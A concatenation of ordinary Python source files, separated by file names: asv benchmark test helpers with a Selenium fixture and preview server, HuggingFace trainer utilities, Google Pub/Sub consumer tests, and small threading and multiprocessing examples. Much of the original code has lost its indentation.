dvcs.commit("Revision {0}.{1}".format(branch_name, i))
return dvcs
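# Illustrative sketch of generate_test_repo(), assuming a pytest-style tmpdir
# and the 'master' branch naming used throughout these helpers: build a small
# git repository with three tagged revisions plus a side branch. The helper
# name, branch name and values are examples only.
def _example_generate_test_repo(tmpdir):
    dvcs = generate_test_repo(tmpdir, values=[1, 2, 3], dvcs_type='git',
                              extra_branches=[('master~1', 'some-branch', [4, 5])])
    # Every revision is tagged, so hashes can be resolved by tag name.
    return dvcs.get_hash('tag0'), dvcs.get_branch_hashes('some-branch')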
def generate_repo_from_ops(tmpdir, dvcs_type, operations):
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
version = 0
for op in operations:
if op[0] == "commit":
copy_template(template_path, dvcs_path, dvcs, {
"version": version,
"dummy_value": op[1],
})
version += 1
dvcs.commit("Revision {0}".format(version), *op[2:])
elif op[0] == "checkout":
dvcs.checkout(*op[1:])
elif op[0] == "merge":
dvcs.merge(*op[1:])
else:
raise ValueError("Unknown dvcs operation {0}".format(op))
return dvcs
def generate_result_dir(tmpdir, dvcs, values, branches=None):
result_dir = join(tmpdir, "results")
os.makedirs(result_dir)
html_dir = join(tmpdir, "html")
machine_dir = join(result_dir, "tarzan")
os.makedirs(machine_dir)
if branches is None:
branches = [None]
conf = config.Config.from_json({
'results_dir': result_dir,
'html_dir': html_dir,
'repo': dvcs.path,
'project': 'asv',
'branches': branches or [None],
})
repo = get_repo(conf)
util.write_json(join(machine_dir, "machine.json"), {
'machine': 'tarzan',
'version': 1,
})
timestamp = datetime.datetime.utcnow()
benchmark_version = sha256(os.urandom(16)).hexdigest()
params = None
param_names = None
for commit, value in values.items():
if isinstance(value, dict):
params = value["params"]
result = Results({"machine": "tarzan"}, {}, commit,
repo.get_date_from_name(commit), "2.7", None)
value = {
'result': [value],
'params': [],
'started_at': timestamp,
'ended_at': timestamp,
'stats': None,
'samples': None,
'number': None,
}
result.add_result("time_func", value, benchmark_version)
result.save(result_dir)
if params:
param_names = ["param{}".format(k) for k in range(len(params))]
util.write_json(join(result_dir, "benchmarks.json"), {
"time_func": {
"name": "time_func",
"params": params or [],
"param_names": param_names or [],
"version": benchmark_version,
}
}, api_version=1)
return conf
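# Illustrative sketch of generate_result_dir(): `values` maps commit hashes to
# benchmark results (plain floats here), and the returned Config points at the
# generated results/html directories, e.g. for a subsequent publish step. The
# helper name and result values are examples only.
def _example_generate_result_dir(tmpdir):
    dvcs = generate_test_repo(tmpdir, values=[0, 1, 2], dvcs_type='git')
    commits = dvcs.get_branch_hashes()
    values = dict((commit, float(i)) for i, commit in enumerate(commits))
    return generate_result_dir(tmpdir, dvcs, values)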
@pytest.fixture(scope="session")
def browser(request, pytestconfig):
"""
Fixture for Selenium WebDriver browser interface
"""
driver_str = pytestconfig.getoption('webdriver')
if driver_str == "None":
pytest.skip("No webdriver selected for tests (use --webdriver).")
# Evaluate the options
def FirefoxHeadless():
from selenium.webdriver.firefox.options import Options
options = Options()
options.add_argument("-headless")
return selenium.webdriver.Firefox(firefox_options=options)
def ChromeHeadless():
options = selenium.webdriver.ChromeOptions()
options.add_argument('headless')
return selenium.webdriver.Chrome(chrome_options=options)
ns = {}
six.exec_("import selenium.webdriver", ns)
six.exec_("from selenium.webdriver import *", ns)
ns['FirefoxHeadless'] = FirefoxHeadless
ns['ChromeHeadless'] = ChromeHeadless
create_driver = ns.get(driver_str, None)
if create_driver is None:
src = "def create_driver():\n"
src += textwrap.indent(driver_str, " ")
six.exec_(src, ns)
create_driver = ns['create_driver']
# Create the browser
browser = create_driver()
# Set timeouts
browser.set_page_load_timeout(WAIT_TIME)
browser.set_script_timeout(WAIT_TIME)
# Clean up on fixture finalization
def fin():
browser.quit()
request.addfinalizer(fin)
# Set default time to wait for AJAX requests to complete
browser.implicitly_wait(WAIT_TIME)
return browser
@contextmanager
def preview(base_path):
"""
Context manager for ASV preview web server. Gives the base URL to use.
Parameters
----------
base_path : str
Path to serve files from
"""
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
# Don't serve from cwd, but from a different directory
path = SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path)
path = os.path.join(base_path, os.path.relpath(path, os.getcwd()))
return util.long_path(path)
httpd, base_url = create_httpd(Handler)
def run():
try:
httpd.serve_forever()
except:
import traceback
traceback.print_exc()
return
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
try:
yield base_url
finally:
# Stop must be run in a separate thread, because
# httpd.shutdown blocks until serve_forever returns. We don't
# want to block here --- it appears in some environments
# problems shutting down the server may arise.
stopper = threading.Thread(target=httpd.shutdown)
stopper.daemon = True
stopper.start()
stopper.join(5.0)
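# Illustrative sketch, assuming a writable temporary directory: serve a
# directory over HTTP with the preview() context manager above. The helper
# name, file name and content are examples only.
def _example_preview_usage(tmpdir):
    html_dir = join(tmpdir, 'html')
    if not isdir(html_dir):
        os.makedirs(html_dir)
    with io.open(join(html_dir, 'index.html'), 'w', encoding='utf-8') as fd:
        fd.write(u'<html><body>hello</body></html>')
    with preview(html_dir) as base_url:
        # Any HTTP client (e.g. the Selenium browser fixture) could now fetch
        # base_url + '/index.html'.
        return base_url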
def get_with_retry(browser, url):
for j in range(2):
try:
return browser.get(url)
except TimeoutException:
time.sleep(2)
return browser.get(url)
|
trainer_utils.py
|
# coding=utf-8
# Copyright 2020-present the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utilities for the Trainer and TFTrainer class. Should be independent from PyTorch and TensorFlow.
"""
import copy
import gc
import inspect
import os
import random
import re
import threading
import time
from typing import Any, Dict, NamedTuple, Optional, Tuple, Union
import numpy as np
from .file_utils import (
ExplicitEnum,
is_psutil_available,
is_sagemaker_dp_enabled,
is_tf_available,
is_torch_available,
is_torch_cuda_available,
is_torch_tpu_available,
)
if is_torch_available():
import torch
if is_tf_available():
import tensorflow as tf
def set_seed(seed: int):
"""
Helper function for reproducible behavior to set the seed in ``random``, ``numpy``, ``torch`` and/or ``tf`` (if
installed).
Args:
seed (:obj:`int`): The seed to set.
"""
random.seed(seed)
np.random.seed(seed)
if is_torch_available():
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# ^^ safe to call this function even if cuda is not available
if is_tf_available():
        tf.random.set_seed(seed)
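# Minimal usage sketch (the helper name and seed value are illustrative, not
# part of the transformers API): seeding once makes subsequent random draws
# reproducible across the installed frameworks.
def _example_set_seed_usage():
    set_seed(42)
    first = np.random.rand(3)
    set_seed(42)
    second = np.random.rand(3)
    # With the same seed, both draws are identical.
    assert np.allclose(first, second)
    return first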
class EvalPrediction(NamedTuple):
"""
Evaluation output (always contains labels), to be used to compute metrics.
Parameters:
predictions (:obj:`np.ndarray`): Predictions of the model.
label_ids (:obj:`np.ndarray`): Targets to be matched.
"""
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: np.ndarray
class EvalLoopOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[np.ndarray]
metrics: Optional[Dict[str, float]]
num_samples: Optional[int]
class PredictionOutput(NamedTuple):
predictions: Union[np.ndarray, Tuple[np.ndarray]]
label_ids: Optional[np.ndarray]
metrics: Optional[Dict[str, float]]
class TrainOutput(NamedTuple):
global_step: int
training_loss: float
metrics: Dict[str, float]
PREFIX_CHECKPOINT_DIR = "checkpoint"
_re_checkpoint = re.compile(r"^" + PREFIX_CHECKPOINT_DIR + r"\-(\d+)$")
def get_last_checkpoint(folder):
content = os.listdir(folder)
checkpoints = [
path
for path in content
if _re_checkpoint.search(path) is not None and os.path.isdir(os.path.join(folder, path))
]
if len(checkpoints) == 0:
return
return os.path.join(folder, max(checkpoints, key=lambda x: int(_re_checkpoint.search(x).groups()[0])))
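# Minimal usage sketch (the helper name and directory layout are illustrative):
# get_last_checkpoint() scans a folder for `checkpoint-<step>` directories and
# returns the one with the highest step, or None if there is none.
def _example_get_last_checkpoint_usage(output_dir):
    for step in (10, 500, 20):
        os.makedirs(os.path.join(output_dir, f"checkpoint-{step}"), exist_ok=True)
    # Returns `<output_dir>/checkpoint-500`, the numerically largest step.
    return get_last_checkpoint(output_dir)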
class IntervalStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class EvaluationStrategy(ExplicitEnum):
NO = "no"
STEPS = "steps"
EPOCH = "epoch"
class BestRun(NamedTuple):
"""
    The best run found by a hyperparameter search (see :class:`~transformers.Trainer.hyperparameter_search`).
Parameters:
run_id (:obj:`str`):
The id of the best run (if models were saved, the corresponding checkpoint will be in the folder ending
with run-{run_id}).
objective (:obj:`float`):
The objective that was obtained for this run.
hyperparameters (:obj:`Dict[str, Any]`):
The hyperparameters picked to get this run.
"""
run_id: str
objective: float
hyperparameters: Dict[str, Any]
def default_compute_objective(metrics: Dict[str, float]) -> float:
"""
    The default objective to maximize/minimize when doing a hyperparameter search. It is the evaluation loss if no
metrics are provided to the :class:`~transformers.Trainer`, the sum of all metrics otherwise.
Args:
metrics (:obj:`Dict[str, float]`): The metrics returned by the evaluate method.
Return:
:obj:`float`: The objective to minimize or maximize
"""
metrics = copy.deepcopy(metrics)
loss = metrics.pop("eval_loss", None)
_ = metrics.pop("epoch", None)
# Remove speed metrics
speed_metrics = [m for m in metrics.keys() if m.endswith("_runtime") or m.endswith("_samples_per_second")]
for sm in speed_metrics:
_ = metrics.pop(sm, None)
return loss if len(metrics) == 0 else sum(metrics.values())
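# Worked example (helper name and metric values are illustrative): with only
# `eval_loss` plus bookkeeping keys, the loss itself is the objective; when
# other metrics remain after filtering, their sum is returned instead.
def _example_default_compute_objective():
    only_loss = {"eval_loss": 0.25, "epoch": 3.0, "eval_runtime": 12.3}
    assert default_compute_objective(only_loss) == 0.25
    with_metrics = {"eval_loss": 0.25, "eval_accuracy": 0.8, "eval_f1": 0.7}
    # eval_loss is popped first, so the objective is 0.8 + 0.7 = 1.5.
    assert abs(default_compute_objective(with_metrics) - 1.5) < 1e-9
    return with_metrics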
def default_hp_space_optuna(trial) -> Dict[str, float]:
from .integrations import is_optuna_available
assert is_optuna_available(), "This function needs Optuna installed: `pip install optuna`"
return {
"learning_rate": trial.suggest_float("learning_rate", 1e-6, 1e-4, log=True),
"num_train_epochs": trial.suggest_int("num_train_epochs", 1, 5),
"seed": trial.suggest_int("seed", 1, 40),
"per_device_train_batch_size": trial.suggest_categorical("per_device_train_batch_size", [4, 8, 16, 32, 64]),
}
def default_hp_space_ray(trial) -> Dict[str, float]:
from .integrations import is_ray_tune_available
assert is_ray_tune_available(), "This function needs ray installed: `pip " "install ray[tune]`"
from ray import tune
return {
"learning_rate": tune.loguniform(1e-6, 1e-4),
"num_train_epochs": tune.choice(list(range(1, 6))),
"seed": tune.uniform(1, 40),
"per_device_train_batch_size": tune.choice([4, 8, 16, 32, 64]),
}
class HPSearchBackend(ExplicitEnum):
OPTUNA = "optuna"
RAY = "ray"
default_hp_space = {
HPSearchBackend.OPTUNA: default_hp_space_optuna,
HPSearchBackend.RAY: default_hp_space_ray,
}
def is_main_process(local_rank):
"""
Whether or not the current process is the local process, based on `xm.get_ordinal()` (for TPUs) first, then on
`local_rank`.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.get_ordinal() == 0
return local_rank in [-1, 0]
def total_processes_number(local_rank):
"""
Return the number of processes launched in parallel. Works with `torch.distributed` and TPUs.
"""
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
return xm.xrt_world_size()
elif is_sagemaker_dp_enabled():
import smdistributed.dataparallel.torch.distributed as dist
return dist.get_world_size()
elif local_rank != -1 and is_torch_available():
import torch
return torch.distributed.get_world_size()
return 1
def speed_metrics(split, start_time, num_samples=None):
"""
Measure and return speed performance metrics.
This function requires a time snapshot `start_time` before the operation to be measured starts and this function
should be run immediately after the operation to be measured has completed.
Args:
- split: name to prefix metric (like train, eval, test...)
- start_time: operation start time
- num_samples: number of samples processed
"""
runtime = time.time() - start_time
result = {f"{split}_runtime": round(runtime, 4)}
if num_samples is not None:
samples_per_second = 1 / (runtime / num_samples)
result[f"{split}_samples_per_second"] = round(samples_per_second, 3)
return result
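# Minimal usage sketch (the helper name, sleep and sample count stand in for a
# real evaluation loop): snapshot the start time, run the measured work, then
# call speed_metrics() immediately afterwards.
def _example_speed_metrics_usage():
    start_time = time.time()
    time.sleep(0.1)  # stand-in for the measured operation
    metrics = speed_metrics("eval", start_time, num_samples=8)
    # Produces keys such as "eval_runtime" and "eval_samples_per_second".
    return metrics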
class SchedulerType(ExplicitEnum):
LINEAR = "linear"
COSINE = "cosine"
COSINE_WITH_RESTARTS = "cosine_with_restarts"
POLYNOMIAL = "polynomial"
CONSTANT = "constant"
CONSTANT_WITH_WARMUP = "constant_with_warmup"
class TrainerMemoryTracker:
"""
A helper class that tracks cpu and gpu memory.
This class will silently skip unless ``psutil`` is available. Install with ``pip install psutil``.
    When a stage completes, it can pass a metrics dict which will be updated with the memory metrics gathered during this stage.
Example ::
self._memory_tracker = TrainerMemoryTracker(self.args.skip_memory_metrics)
self._memory_tracker.start()
code ...
metrics = {"train_runtime": 10.5}
self._memory_tracker.stop_and_update_metrics(metrics)
At the moment GPU tracking is only for ``pytorch``, but can be extended to support ``tensorflow``.
To understand this class' intricacies please read the documentation of :meth:`~transformers.Trainer.log_metrics`.
"""
# map trainer methods to metrics prefix
stages = {
"__init__": "init",
"train": "train",
"evaluate": "eval",
"predict": "test",
}
def __init__(self, skip_memory_metrics=False):
self.skip_memory_metrics = skip_memory_metrics
if not is_psutil_available():
# soft dependency on psutil
self.skip_memory_metrics = True
if self.skip_memory_metrics:
return
import psutil # noqa
if is_torch_cuda_available():
import torch
self.torch = torch
self.gpu = {}
else:
self.torch = None
self.process = psutil.Process()
self.cur_stage = None
self.cpu = {}
self.init_reported = False
def derive_stage(self):
""" derives the stage/caller name automatically """
caller = inspect.currentframe().f_back.f_back.f_code.co_name
if caller in self.stages:
return self.stages[caller]
else:
raise ValueError(
f"was called from {caller}, but only expect to be called from one of {self.stages.keys()}"
)
def cpu_mem_used(self):
""" get resident set size memory for the current process """
return self.process.memory_info().rss
def peak_monitor_func(self):
self.cpu_mem_used_peak = -1
while True:
self.cpu_mem_used_peak = max(self.cpu_mem_used(), self.cpu_mem_used_peak)
# can't sleep or will not catch the peak right (this comment is here on purpose)
# time.sleep(0.001) # 1msec
if not self.peak_monitoring:
break
def start(self):
""" start tracking for the caller's stage """
if self.skip_memory_metrics:
return
stage = self.derive_stage()
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
self.cur_stage = stage
gc.collect()
if self.torch is not None:
self.torch.cuda.reset_peak_memory_stats()
self.torch.cuda.empty_cache()
# gpu
if self.torch is not None:
self.gpu_mem_used_at_start = self.torch.cuda.memory_allocated()
# cpu
self.cpu_mem_used_at_start = self.cpu_mem_used()
self.peak_monitoring = True
peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
peak_monitor_thread.daemon = True
peak_monitor_thread.start()
def stop(self, stage):
""" stop tracking for the passed stage """
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# this sends a signal to peak_monitor_func to complete its loop
self.peak_monitoring = False
# first ensure all objects get collected and their memory is freed
gc.collect()
if self.torch is not None:
self.torch.cuda.empty_cache()
# concepts:
# - alloc_delta: the difference of allocated memory between the end and the start
# - peaked_delta: the difference between the peak memory and the current memory
# in order to know how much memory the measured code consumed one needs to sum these two
# gpu
if self.torch is not None:
self.gpu_mem_used_now = self.torch.cuda.memory_allocated()
self.gpu_mem_used_peak = self.torch.cuda.max_memory_allocated()
self.gpu[self.cur_stage] = dict(
alloc=(self.gpu_mem_used_now - self.gpu_mem_used_at_start),
peaked=max(0, self.gpu_mem_used_peak - self.gpu_mem_used_now),
)
# cpu
self.cpu_mem_used_now = self.cpu_mem_used()
self.cpu[self.cur_stage] = dict(
alloc=(self.cpu_mem_used_now - self.cpu_mem_used_at_start),
peaked=max(0, self.cpu_mem_used_peak - self.cpu_mem_used_now),
)
# reset - cycle finished
self.cur_stage = None
    def update_metrics(self, stage, metrics):
        """ update the passed metrics dict with the memory deltas tracked for the given stage """
if self.skip_memory_metrics:
return
# deal with nested calls of eval during train - simply ignore those
if self.cur_stage is not None and self.cur_stage != stage:
return
# since we don't have a way to return init metrics, we push them into the first of train/val/predict
stages = [stage]
if not self.init_reported:
stages.insert(0, "init")
self.init_reported = True
for stage in stages:
for t in ["alloc", "peaked"]:
if stage in self.cpu and t in self.cpu[stage]:
metrics[f"{stage}_mem_cpu_{t}_delta"] = self.cpu[stage][t]
if self.torch is not None and stage in self.gpu and t in self.gpu[stage]:
metrics[f"{stage}_mem_gpu_{t}_delta"] = self.gpu[stage][t]
def stop_and_update_metrics(self, metrics=None):
""" combine stop + update in one call for simpler code """
if self.skip_memory_metrics:
return
stage = self.derive_stage()
self.stop(stage)
# init doesn't have metrics to update so we just save that data for later stages to retrieve
if metrics is not None:
self.update_metrics(stage, metrics)
def denumpify_detensorize(metrics):
"""
Recursively calls `.item()` on the element of the dictionary passed
"""
if isinstance(metrics, (list, tuple)):
return type(metrics)(denumpify_detensorize(m) for m in metrics)
elif isinstance(metrics, dict):
return type(metrics)({k: denumpify_detensorize(v) for k, v in metrics.items()})
elif isinstance(metrics, np.generic):
return metrics.item()
elif is_torch_available() and isinstance(metrics, torch.Tensor) and metrics.numel() == 1:
return metrics.item()
return metrics
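# Minimal sketch (the helper name and input values are illustrative): nested
# containers of numpy scalars are converted to plain Python numbers, which
# keeps metrics JSON-serializable; one-element torch tensors are handled the
# same way when torch is installed.
def _example_denumpify_detensorize():
    raw = {"eval_loss": np.float32(0.25), "counts": [np.int64(3), 7]}
    cleaned = denumpify_detensorize(raw)
    assert isinstance(cleaned["eval_loss"], float)
    assert cleaned["counts"] == [3, 7]
    return cleaned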
class ShardedDDPOption(ExplicitEnum):
SIMPLE = "simple"
ZERO_DP_2 = "zero_dp_2"
ZERO_DP_3 = "zero_dp_3"
OFFLOAD = "offload"
AUTO_WRAP = "auto_wrap"
|
thread_name.py
|
import threading
import time
def myThread():
print(f'Thread {threading.current_thread().name} started')
time.sleep(5)
print(f'Thread {threading.current_thread().name} finished')
for i in range(4):
threadName = 'Thread-' + str(i)
thread = threading.Thread(name=threadName, target=myThread)
thread.start()
print(f'{threading.enumerate()}')
'''
Thread Thread-0 started
Thread Thread-1 started
Thread Thread-2 started
Thread Thread-3 started
[
<_MainThread(MainThread, started 4593550784)>,
<Thread(Thread-0, started 123145357635584)>,
<Thread(Thread-1, started 123145374425088)>,
<Thread(Thread-2, started 123145391214592)>,
<Thread(Thread-3, started 123145408004096)>
]
Thread Thread-0 finished
Thread Thread-1 finished
Thread Thread-3 finished
Thread Thread-2 finished
'''
|
test_consumer.py
|
# Copyright 2017, Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import types as base_types
from google.auth import credentials
import mock
import pytest
from six.moves import queue
from google.cloud.pubsub_v1 import subscriber
from google.cloud.pubsub_v1 import types
from google.cloud.pubsub_v1.subscriber import _consumer
from google.cloud.pubsub_v1.subscriber import _helper_threads
from google.cloud.pubsub_v1.subscriber.policy import thread
def test_send_request():
consumer = _consumer.Consumer()
request = types.StreamingPullRequest(subscription='foo')
with mock.patch.object(queue.Queue, 'put') as put:
consumer.send_request(request)
put.assert_called_once_with(request)
def test_request_generator_thread():
consumer = _consumer.Consumer()
creds = mock.Mock(spec=credentials.Credentials)
client = subscriber.Client(credentials=creds)
policy = client.subscribe('sub_name_e')
generator = consumer._request_generator_thread(policy)
# The first request that comes from the request generator thread
# should always be the initial request.
initial_request = next(generator)
assert initial_request.subscription == 'sub_name_e'
assert initial_request.stream_ack_deadline_seconds == 10
# Subsequent requests correspond to items placed in the request queue.
consumer.send_request(types.StreamingPullRequest(ack_ids=['i']))
request = next(generator)
assert request.ack_ids == ['i']
# The poison pill should stop the loop.
consumer.send_request(_helper_threads.STOP)
with pytest.raises(StopIteration):
next(generator)
def test_blocking_consume():
policy = mock.Mock(spec=('call_rpc', 'on_response'))
policy.call_rpc.return_value = iter((mock.sentinel.A, mock.sentinel.B))
consumer = _consumer.Consumer()
consumer.resume()
assert consumer._blocking_consume(policy) is None
policy.call_rpc.assert_called_once()
policy.on_response.assert_has_calls(
[mock.call(mock.sentinel.A), mock.call(mock.sentinel.B)])
@mock.patch.object(_consumer, '_LOGGER')
def test_blocking_consume_when_exiting(_LOGGER):
consumer = _consumer.Consumer()
assert consumer._stopped.is_set() is False
consumer._stopped.set()
# Make sure method cleanly exits.
assert consumer._blocking_consume(None) is None
_LOGGER.debug.assert_called_once_with('Event signaled consumer exit.')
class OnException(object):
def __init__(self, acceptable=None):
self.acceptable = acceptable
def __call__(self, exception):
if exception is self.acceptable:
return True
else:
return False
def test_blocking_consume_on_exception():
policy = mock.Mock(spec=('call_rpc', 'on_response', 'on_exception'))
policy.call_rpc.return_value = iter((mock.sentinel.A, mock.sentinel.B))
exc = TypeError('Bad things!')
policy.on_response.side_effect = exc
consumer = _consumer.Consumer()
consumer.resume()
consumer._consumer_thread = mock.Mock(spec=threading.Thread)
policy.on_exception.side_effect = OnException()
# Establish that we get responses until we are sent the exiting event.
consumer._blocking_consume(policy)
assert consumer._consumer_thread is None
# Check mocks.
policy.call_rpc.assert_called_once()
policy.on_response.assert_called_once_with(mock.sentinel.A)
policy.on_exception.assert_called_once_with(exc)
class RaisingResponseGenerator(object):
# NOTE: This is needed because defining `.next` on an **instance**
# rather than the **class** will not be iterable in Python 2.
# This is problematic since a `Mock` just sets members.
def __init__(self, exception):
self.exception = exception
self.done_calls = 0
self.next_calls = 0
def done(self):
self.done_calls += 1
return True
def __next__(self):
self.next_calls += 1
raise self.exception
def next(self):
return self.__next__() # Python 2
def test_blocking_consume_two_exceptions():
policy = mock.Mock(spec=('call_rpc', 'on_exception'))
exc1 = NameError('Oh noes.')
exc2 = ValueError('Something grumble.')
policy.on_exception.side_effect = OnException(acceptable=exc1)
response_generator1 = RaisingResponseGenerator(exc1)
response_generator2 = RaisingResponseGenerator(exc2)
policy.call_rpc.side_effect = (response_generator1, response_generator2)
consumer = _consumer.Consumer()
consumer.resume()
consumer._consumer_thread = mock.Mock(spec=threading.Thread)
# Establish that we get responses until we are sent the exiting event.
assert consumer._blocking_consume(policy) is None
assert consumer._consumer_thread is None
# Check mocks.
assert policy.call_rpc.call_count == 2
assert response_generator1.next_calls == 1
assert response_generator1.done_calls == 1
assert response_generator2.next_calls == 1
assert response_generator2.done_calls == 0
policy.on_exception.assert_has_calls(
[mock.call(exc1), mock.call(exc2)])
def test_paused():
consumer = _consumer.Consumer()
assert consumer.paused is True
consumer._can_consume.set()
assert consumer.paused is False
consumer._can_consume.clear()
assert consumer.paused is True
@mock.patch.object(_consumer, '_LOGGER')
def test_pause(_LOGGER):
consumer = _consumer.Consumer()
consumer._can_consume.set()
assert consumer.pause() is None
assert not consumer._can_consume.is_set()
_LOGGER.debug.assert_called_once_with('Pausing consumer')
@mock.patch.object(_consumer, '_LOGGER')
def test_resume(_LOGGER):
consumer = _consumer.Consumer()
consumer._can_consume.clear()
assert consumer.resume() is None
assert consumer._can_consume.is_set()
_LOGGER.debug.assert_called_once_with('Resuming consumer')
def test_start_consuming():
creds = mock.Mock(spec=credentials.Credentials)
client = subscriber.Client(credentials=creds)
policy = client.subscribe('sub_name_e')
consumer = _consumer.Consumer()
with mock.patch.object(threading, 'Thread', autospec=True) as Thread:
consumer.start_consuming(policy)
assert consumer._stopped.is_set() is False
Thread.assert_called_once_with(
name=_consumer._BIDIRECTIONAL_CONSUMER_NAME,
target=consumer._blocking_consume,
args=(policy,),
)
assert consumer._consumer_thread is Thread.return_value
def test_stop_consuming():
consumer = _consumer.Consumer()
assert consumer._stopped.is_set() is False
thread = mock.Mock(spec=threading.Thread)
consumer._consumer_thread = thread
assert consumer.stop_consuming() is None
# Make sure state was updated.
assert consumer._stopped.is_set() is True
assert consumer._consumer_thread is None
# Check mocks.
thread.join.assert_called_once_with()
def basic_queue_generator(queue, received):
while True:
value = queue.get()
received.put(value)
yield value
def test_stop_request_generator_response_not_done():
consumer = _consumer.Consumer()
response_generator = mock.Mock(spec=('done',))
response_generator.done.return_value = False
stopped = consumer._stop_request_generator(None, response_generator)
assert stopped is False
# Check mocks.
response_generator.done.assert_called_once_with()
def test_stop_request_generator_not_running():
# Model scenario tested:
# - The request generator **is not** running
# - The request queue **is not** empty
# Expected result:
# - ``_stop_request_generator()`` successfully calls ``.close()``
consumer = _consumer.Consumer()
queue_ = consumer._request_queue
received = queue.Queue()
request_generator = basic_queue_generator(queue_, received)
item1 = 'unblock-please'
item2 = 'still-here'
queue_.put(item1)
queue_.put(item2)
assert not queue_.empty()
assert received.empty()
thread = threading.Thread(target=next, args=(request_generator,))
thread.start()
# Make sure the generator is not stuck at the blocked ``.get()``
# in the thread.
while request_generator.gi_running:
pass
assert received.get() == item1
# Make sure it **isn't** done.
assert request_generator.gi_frame is not None
response_generator = mock.Mock(spec=('done',))
response_generator.done.return_value = True
stopped = consumer._stop_request_generator(
request_generator, response_generator)
assert stopped is True
# Make sure it **is** done.
assert not request_generator.gi_running
assert request_generator.gi_frame is None
assert not queue_.empty()
assert queue_.get() == item2
assert queue_.empty()
# Check mocks.
response_generator.done.assert_called_once_with()
def test_stop_request_generator_close_failure():
# Model scenario tested:
# - The input isn't actually a generator
# Expected result:
# - ``_stop_request_generator()`` falls through to the ``LOGGER.error``
# case and returns ``False``
consumer = _consumer.Consumer()
request_generator = mock.Mock(spec=('close',))
request_generator.close.side_effect = TypeError('Really, not a generator')
response_generator = mock.Mock(spec=('done',))
response_generator.done.return_value = True
stopped = consumer._stop_request_generator(
request_generator, response_generator)
assert stopped is False
# Make sure close() was only called once.
request_generator.close.assert_called_once_with()
response_generator.done.assert_called_once_with()
def test_stop_request_generator_queue_non_empty():
# Model scenario tested:
# - The request generator **is** running
# - The request queue **is not** empty
# Expected result:
# - ``_stop_request_generator()`` can't call ``.close()`` (since
# the generator is running) but then returns with ``False`` because
# the queue **is not** empty
consumer = _consumer.Consumer()
# Attach a "fake" queue to the request generator so the generator can
# block on an empty queue while the consumer's queue is not empty.
queue_ = queue.Queue()
received = queue.Queue()
request_generator = basic_queue_generator(queue_, received)
# Make sure the consumer's queue is not empty.
item1 = 'not-empty'
consumer._request_queue.put(item1)
thread = threading.Thread(target=next, args=(request_generator,))
thread.start()
# Make sure the generator is stuck at the blocked ``.get()``
# in ``thread``.
while not request_generator.gi_running:
pass
assert received.empty()
assert request_generator.gi_frame is not None
response_generator = mock.Mock(spec=('done',))
response_generator.done.return_value = True
stopped = consumer._stop_request_generator(
request_generator, response_generator)
assert stopped is False
# Make sure the generator is **still** not finished.
assert request_generator.gi_running
assert request_generator.gi_frame is not None
assert consumer._request_queue.get() == item1
# Allow the generator to exit.
item2 = 'just-exit'
queue_.put(item2)
# Wait until it's actually done.
while request_generator.gi_running:
pass
assert received.get() == item2
# Check mocks.
response_generator.done.assert_called_once_with()
def test_stop_request_generator_running():
# Model scenario tested:
# - The request generator **is** running
# - The request queue **is** empty
# Expected result:
# - ``_stop_request_generator()`` can't call ``.close()`` (since
# the generator is running) but then verifies that the queue is
# empty and sends ``STOP`` into the queue to successfully stop
# the generator
consumer = _consumer.Consumer()
queue_ = consumer._request_queue
received = queue.Queue()
request_generator = basic_queue_generator(queue_, received)
thread = threading.Thread(target=next, args=(request_generator,))
thread.start()
# Make sure the generator is stuck at the blocked ``.get()``
# in the thread.
while not request_generator.gi_running:
pass
assert received.empty()
assert request_generator.gi_frame is not None
response_generator = mock.Mock(spec=('done',))
response_generator.done.return_value = True
stopped = consumer._stop_request_generator(
request_generator, response_generator)
assert stopped is True
# Make sure it **is** done, though we may have to wait until
# the generator finishes (it has a few instructions between the
# ``get()`` and the ``break``).
while request_generator.gi_running:
pass
request_generator.close()
assert request_generator.gi_frame is None
assert received.get() == _helper_threads.STOP
assert queue_.empty()
# Check mocks.
response_generator.done.assert_called_once_with()
|
interface_multiprocessing.py
|
from multiprocessing import Process
def setup_multiprocessing(target, data_list):
processes = []
for index, data in enumerate(data_list):
print("make process #{}".format(index))
process = Process(target=target, args=(data,))
processes.append(process)
process.start()
return processes
def start_multiprocessing(processes):
for process in processes:
process.join()
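# Illustrative sketch (the worker function and data are assumptions made for
# the example): spawn one process per item with setup_multiprocessing(), which
# also starts the processes, then wait for them all with
# start_multiprocessing(), which only joins them.
def _example_worker(data):
    print("processing {}".format(data))

if __name__ == "__main__":
    workers = setup_multiprocessing(_example_worker, [1, 2, 3])
    start_multiprocessing(workers)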
|
thread_event.py
|
